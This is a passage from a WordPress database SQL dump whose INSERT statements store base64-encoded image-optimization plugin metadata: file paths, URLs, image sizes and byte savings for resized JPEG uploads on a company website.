uanBnIiwicmVkdWN0aW9uIjo2MjksInRpbWUiOjE0ODM1NjQwOTksImlkIjoxNzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc2MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjAwMSwidGltZSI6MTQ4MzU2NDEwMiwiaWQiOjE3NzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQyOCwidGltZSI6MTQ4MzU2NDEwNSwiaWQiOjE3NzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU2MCwidGltZSI6MTQ4MzU2NDEwOSwiaWQiOjE3NzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY5NiwidGltZSI6MTQ4MzU2NDExMiwiaWQiOjE3NzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMjEsInRpbWUiOjE0ODM1NjQxMTUsImlkIjoxNzcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2MC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzYwLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6Mzg5LCJ0aW1lIjoxNDgzNTY0MTE5LCJpZCI6MTc3Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29212, 1771, 'wpfc_optimisation_reduction', '25575'); 
INSERT INTO `wp_postmeta` VALUES (29213, 1771, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQxMjMsImlkIjoiMTc3MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzU1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4NDYsInRpbWUiOjE0ODM1NjQxMjcsImlkIjoxNzcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjg4NSwidGltZSI6MTQ4MzU2NDEzMCwiaWQiOjE3NzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzU1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNjE4LCJ0aW1lIjoxNDgzNTY0MTMzLCJpZCI6MTc3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTI3NTEsInRpbWUiOjE0ODM1NjQxMzcsImlkIjoxNzcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1NS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjA1LCJ0aW1lIjoxNDgzNTY0MTQxLCJpZCI6MTc3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxMywidGltZSI6MTQ4MzU2NDE0NCwiaWQiOjE3NzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzU1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1ODIsInRpbWUiOjE0ODM1NjQxNDcsImlkIjoxNzcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1NS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTgzMCwidGltZSI6MTQ4MzU2NDE1MSwiaWQiOjE3NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTUtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxOSwidGltZSI6MTQ4MzU2NDE1NCwiaWQiOjE3NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTUtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU3MCwidGltZSI6MTQ4MzU2NDE1NywiaWQiOjE3NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY0NCwidGltZSI6MTQ4MzU2NDE2MSwiaWQiOjE3NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTUtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjkzMSwidGltZSI6MTQ4MzU2NDE2NCwiaWQiOjE3NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTUtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzU1LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTUtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODEsInRpbWUiOjE0ODM1NjQxNjcsImlkIjoxNzcxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29214, 1770, 'wpfc_optimisation_reduction', '26402'); 
INSERT INTO `wp_postmeta` VALUES (29215, 1770, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQxNzIsImlkIjoiMTc3MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MDcsInRpbWUiOjE0ODM1NjQxNzUsImlkIjoxNzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzA4MSwidGltZSI6MTQ4MzU2NDE3OSwiaWQiOjE3NzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNzA0LCJ0aW1lIjoxNDgzNTY0MTgyLCJpZCI6MTc3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMxMTAsInRpbWUiOjE0ODM1NjQxODYsImlkIjoxNzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjE5LCJ0aW1lIjoxNDgzNTY0MTg5LCJpZCI6MTc3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxMywidGltZSI6MTQ4MzU2NDE5MiwiaWQiOjE3NzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1ODIsInRpbWUiOjE0ODM1NjQxOTYsImlkIjoxNzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTkwOSwidGltZSI6MTQ4MzU2NDE5OSwiaWQiOjE3NzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5X